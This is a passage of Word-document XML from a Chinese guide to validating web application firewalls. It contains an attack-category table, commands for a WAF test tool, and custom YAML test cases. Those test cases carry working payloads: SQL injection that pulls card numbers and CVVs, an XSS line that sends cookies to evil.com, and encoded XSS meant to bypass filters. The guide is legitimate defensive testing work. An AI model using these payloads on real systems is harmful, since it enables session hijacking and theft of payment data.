            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="262792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NoSQL 注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="383C759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高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="288CBE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</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6CBB0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72A1A7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注入攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="055B6E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命令注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="306B6C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高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="156A236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</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4E7CE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4BA912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注入攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="5A302D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LDAP 注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="4FAF7A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中危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="564A00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</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3E986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1F8D25C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跨站脚本</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="609629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反射型 XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0E4CBB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高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="23EFD4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</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4C20D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4CC2E3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跨站脚本</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="2C7E0A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存储型 XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="52AA12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高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="103B1B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</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0D22C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77CBBB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跨站脚本</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="143F9E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DOM 型 XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1837F4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高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="16E737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</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="491A2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7AD952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文件操作</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="554D74F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路径遍历</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="45B869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高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="3ADFEB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</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="49D01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0BFCEF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文件操作</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5AF1FF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文件上传</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="10DA96A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高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="65C4C0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</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="31745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67B3E5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文件操作</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="21AA74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文件包含</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="11BF9C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高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="71E56C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</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6478B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6E33DF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XML 攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5FF0D2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XXE 注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="19633A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高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="21A02E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</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4D5C2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0746D2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协议攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="7886C8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HTTP 走私</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="50CAF7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中危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="3BAE48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</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="21C63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2FD5F4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协议攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="67E41F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SSRF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1FC9DF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高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5CAAC2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</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3867B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707755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认证攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="66B877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用户代理欺骗</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="3DB032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中危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="7CC7A2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</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="24CB2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7B5E70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误报测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6C2FF5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正常业务请求</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="74DB5D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中危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="42A5EA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真负例</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="49DB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438869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编码绕过</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="3A1A6D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多重编码</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="5569106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高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="469575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</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7D945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2BF790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编码绕过</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3EA7C4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大小写混淆</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6D031A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中危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="46FAC0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真正例</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="45019173">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="646B3CAF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C8923B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测试执行方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD6CEF2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76B9B9A7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3.2.1 基础测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1C26FB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="343BBC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执行标准测试套件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140A2D4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\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8C66D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--url=https://target.example.com \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3853457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--wafName="目标WAF名称" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C92C3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--testSet=owasp,owasp-api \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9627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--reportFormat=html,pdf,docx \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0E68D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--reportName=baseline-test \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D069E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58242270">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0408078F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EB39B17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3.2.2 社区测试用例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A57608">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D80023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使用社区贡献的测试用例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B82F0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\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B01C9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--url=https://target.example.com \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAA51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--testCasesPath=testcases/community \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE63C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--reportFormat=docx \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637E6F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74EADF9E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="743E683A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51885811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3.2.3 大载荷测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C6E08F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24B011F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测试 WAF 对大尺寸请求的处理能力：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D25B42">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6536798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测试包含大载荷的攻击（内置测试集已包含 8KB/16KB/32KB/64KB/128KB 测试）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5DE7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\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027E01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--url=https://target.example.com \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BD26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--testCase=community-128kb-rce,community-128kb-sqli,community-128kb-xss \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBD9BF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436C59C1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C604159">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29CA7DC9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3.2.4 误报测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62302072">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72B17FF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执行真负例测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF8000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\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548E7D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--url=https://target.example.com \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F180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--testCasesPath=testcases/false-pos \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCDCA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--reportName=false-positive-test \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7C20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112A028E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3657A63C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58CBCBC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自定义测试用例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAAD6A8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="138CFA95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3.3.1 企业特定攻击场景</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B4DAFA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B64A3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创建 【testcases/custom/business-attacks.yaml】：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B02BC8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ED385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payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668282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企业特定敏感信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533089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"admin' OR '1'='1' --"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2233E68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"1 UNION SELECT credit_card, cvv FROM payments --"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166A8E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"&lt;script&gt;document.location='http://evil.com/steal?c='+document.cookie&lt;/script&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB4F2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encoder:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401E6F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Plain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106A65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Base64Flat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEE6C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URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CBA2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placeholder:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E04BA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URLParam</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213E25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JSONBody</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C2A2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Header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692DCF3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type: Business Logic Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDC640A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="400B47CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DE7306B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3.3.2 绕过技术测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3F9536">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A0A14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创建 【testcases/custom/bypass-techniques.yaml】：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C08EFD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69E65D9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payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1622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双重 URL 编码绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66423D4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"%253Cscript%253Ealert(1)%253C%252Fscript%253E"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172A0B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Unicode 编码绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8FA28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"\u003cscript\u003ealert(1)\u003c/script\u003e"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725DAB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HTML 实体编码绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2017A1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"&amp;#60;script&amp;#62;alert(1)&amp;#60;/script&amp;#62;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF246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encoder:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7673C21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Plain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3960ABF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placeholder:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CE223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URLParam</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEE10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JSONBody</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1179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type: Bypass Technique</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696F366E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EF8AFB5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74FB86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1E0EFF0C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29863F5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四、验证流程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FD3627">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="071A939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流程图</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FF9B17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="576331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063C1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                         WAF 安全验证流程                                  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338683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AA2867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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC4D6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▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AEE1A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┌─────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BEBA9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第一阶段      │   准备工作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135CAC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环境准备      │   - 搭建测试环境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECFB7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└────────┬────────┘   - 配置网络连通性</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE7D2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         - 准备测试工具</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DF6A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▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8E78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┌─────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEC9B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第二阶段      │   信息收集</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2A036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WAF识别       │   - 识别 WAF 类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1945F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└────────┬────────┘   - 了解 WAF 配置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069BB3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         - 确定拦截规则</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3877E0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▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AC01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┌─────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191F0DA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第三阶段      │   标准测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8EAE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基线测试      │   - 执行 OWASP 测试集</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049BAB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└────────┬────────┘   - 执行 API 测试集</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D103D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         - 生成基线报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B8C5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▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53173D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┌─────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1E72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第四阶段      │   深度测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CD58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进阶测试      │   - 执行社区测试用例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C12EF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└────────┬────────┘   - 执行自定义测试用例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEB17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         - 执行大载荷测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CD32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▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6227E0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┌─────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3673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第五阶段      │   误报测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E6406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真负例测试    │   - 执行正常请求测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281F4F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└────────┬────────┘   - 评估误报率</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6E22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         - 分析误报原因</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126ACE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▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15878A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┌─────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2AB6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第六阶段      │   报告编写</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36720B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结果分析      │   - 汇总测试结果</w:t>
      </w:r>
